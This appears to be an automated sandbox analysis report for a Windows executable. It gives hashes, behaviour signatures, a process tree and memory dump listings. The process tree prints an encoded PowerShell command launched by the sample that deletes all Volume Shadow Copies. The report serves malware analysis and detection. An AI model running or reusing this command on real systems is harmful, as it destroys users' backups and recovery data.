Analysis

  • max time kernel
    119s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:08

General

  • Target

    c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe

  • Size

    164KB

  • MD5

    05bdfc5aae2670314d0b248427a56b36

  • SHA1

    33e1b6b524cbba471ec8638d1cc79e95c2bc415f

  • SHA256

    c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390

  • SHA512

    b2d7bb4ee01dc06e90096ecd558f83a32644b296521082214c485e952b9d36be8419499802d15937c8d51aa47589d99f9025ba139bc4289fc419a5548cd8f333

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies data under HKEY_USERS 42 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe
    "C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe"
    1⤵
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1328
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:920
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1088

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1328-127-0x00000235B7B60000-0x00000235B7B82000-memory.dmp
      Filesize

      136KB

    • memory/1328-131-0x00000235B8660000-0x00000235B86D6000-memory.dmp
      Filesize

      472KB

    • memory/1328-143-0x000002359F9A0000-0x00000235B7B60000-memory.dmp
      Filesize

      385.8MB

    • memory/1328-144-0x000002359F9A0000-0x00000235B7B60000-memory.dmp
      Filesize

      385.8MB

    • memory/2608-118-0x0000000000710000-0x000000000085A000-memory.dmp
      Filesize

      1.3MB

    • memory/2608-119-0x0000000000710000-0x000000000085A000-memory.dmp
      Filesize

      1.3MB

    • memory/2608-120-0x0000000000710000-0x000000000085A000-memory.dmp
      Filesize

      1.3MB

    • memory/2608-121-0x0000000000A50000-0x0000000000A51000-memory.dmp
      Filesize

      4KB

    • memory/2608-122-0x0000000000A60000-0x0000000000A66000-memory.dmp
      Filesize

      24KB